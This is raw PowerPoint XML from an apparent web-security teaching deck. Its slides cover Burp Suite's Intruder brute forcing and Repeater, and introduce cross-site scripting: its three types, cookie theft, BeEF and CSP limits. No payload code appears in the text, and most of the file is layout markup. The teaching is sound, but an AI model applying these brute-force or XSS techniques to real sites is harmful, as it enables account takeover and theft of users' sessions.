              <a:t>Configure the request parameters that need to change in the attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0D9182F-F0E8-4139-B4EA-F04BC278AEE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6747066" y="1295400"/>
            <a:ext cx="5031352" cy="1340712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{288EFDE9-C46C-404D-AE3E-32028F34C524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8716617" y="1914797"/>
            <a:ext cx="1113183" cy="4904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71A15178-E10A-4E76-9671-D0B32F338169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="33219"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1784140" y="3637903"/>
            <a:ext cx="8810973" cy="2375271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E3AAF20-FE43-4764-BF0D-27861805638E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7109791" y="4825538"/>
            <a:ext cx="1113183" cy="4904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6C823D69-ADB6-4C29-A55C-5C91D1A35C18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2141987" y="4487464"/>
            <a:ext cx="1714396" cy="4904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40866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38677-3E23-45B2-BCBB-5CEDE94F78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75ED40D-013C-441B-8837-42C0C471B8C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intruder (2/2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD35B3A8-DA76-4111-A38D-8977AB5C7512}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="6652383" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple payloads supported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple replace, recursive replacement, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For this brute force, a simple list is fine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Not shown: additional option to look for specific text in the response and mark the request that produced it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DA52707-139A-44F0-BA40-39D6593AD314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="50266"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7446938" y="679717"/>
            <a:ext cx="4020111" cy="2904269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8F4D17D-0141-407E-A0B1-62D8D514153E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="51820"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9203457" y="3001550"/>
            <a:ext cx="2683565" cy="2784926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722290AA-02CD-47B4-A486-5F5807EEBDDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="233622" y="4396422"/>
            <a:ext cx="8383170" cy="1638529"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E3AAF20-FE43-4764-BF0D-27861805638E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225671" y="5599747"/>
            <a:ext cx="8391121"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727531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A99F33-C34A-490F-ADC7-5EBC797FFE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77F4CC9-26E7-42A6-A607-46555FEF02A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Repeater</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F1FF820-E42A-4CDE-B311-825CB2405DE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="11344368" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to Intruder – takes a prior request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows for more manual editing of requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful when you need to experiment and aren’t changing a lot of info each time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B9C4D48-465D-47BF-A0A9-C06E5DB7F338}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1169966" y="2994020"/>
            <a:ext cx="9833114" cy="3178180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E4E0341-989E-489C-B678-8A26FF09A816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7166113" y="5452670"/>
            <a:ext cx="3342792"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732EA965-AC2B-4137-99DD-4EEA10581E44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3392556" y="3429000"/>
            <a:ext cx="2461592"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7ED4943D-A0C5-4C11-A429-2EA0D59BFB60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="52561"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1899247" y="4919668"/>
            <a:ext cx="4772691" cy="1500362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BACC750-1E6B-4492-8B61-AE9AFADB1D39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3054796" y="6053652"/>
            <a:ext cx="1845195"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13" name="Straight Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2451700-1DB5-4F55-88D4-1EE0679203B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4899991" y="5098774"/>
            <a:ext cx="2484783" cy="9548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52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Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1863475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A51831-90DF-45E7-90C3-A8F2A9DFCE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02050B0-7F92-4F26-BABB-12C26C7FB991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A little theory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A7FB002-C7EE-47F5-AFEA-DC4756BABF88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="6294574" cy="4986130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Three types: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and DOM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Caused by failure to escape elements rendered as HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored: XSS payload is stored on the server and presented to any visitor loading the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: comment section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected: User input as variable reflected to visitor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: site search parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374C0555-6A4A-4BBB-BC05-39464017E3A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="55456" r="22062"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7039393" y="2720350"/>
            <a:ext cx="4967077" cy="1417299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371468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64299-8EE9-467A-9D48-F5AE40DF4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45B2788-4D95-4B6E-BF54-F675BCA3AF31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses and Limitations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{675BD238-BD84-4D74-A4DD-577725C694D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="7437575" cy="5035826"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cause users to execute code unwittingly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Steal cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load advanced frameworks like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start a social engineering attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limitations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripts can typically only access resources for the current DOM – can’t steal a cookie for Gmail from vulnerablesite.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unless the browser itself is vulnerable, likely need to social engineer any further code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content Security Policy can easily prevent scripts from reaching out to external sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Logo, company name&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{046CAA99-4C3F-4A51-9912-FE86A9386AD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="17455" r="19355"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7851913" y="2017643"/>
            <a:ext cx="3805204" cy="2822714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3007951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687D86-2355-4744-930E-3D0457CEE6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874D8FD-A4C6-4A4A-8F93-61CB8AE0F442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored Example – Simple Alert</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25791A1F-AEC6-49BC-A996-949F372DD363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="630495" y="1304111"/>
            <a:ext cx="6573167" cy="2010056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87992E09-4F01-4B75-8363-BD2C271C4886}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5259644" y="2487033"/>
            <a:ext cx="6373114" cy="3181794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8F077CB-C277-4F8D-8914-C6A6663FCD51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="331068" y="3655833"/>
            <a:ext cx="3867994" cy="768939"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Isosceles Triangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10C860F-5E5B-4967-8AC6-DDEC6DA4CD28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18647505">
            <a:off x="845974" y="3734666"/>
            <a:ext cx="1850324" cy="1564594"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst>
              <a:gd name="adj" fmla="val 33533"/>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B4F83F50-4542-4250-9C7E-56E5961960C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1758985" y="4365356"/>
            <a:ext cx="3017503" cy="1363120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82B8F504-91C9-4BDC-BC3A-3A77E54F7EB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
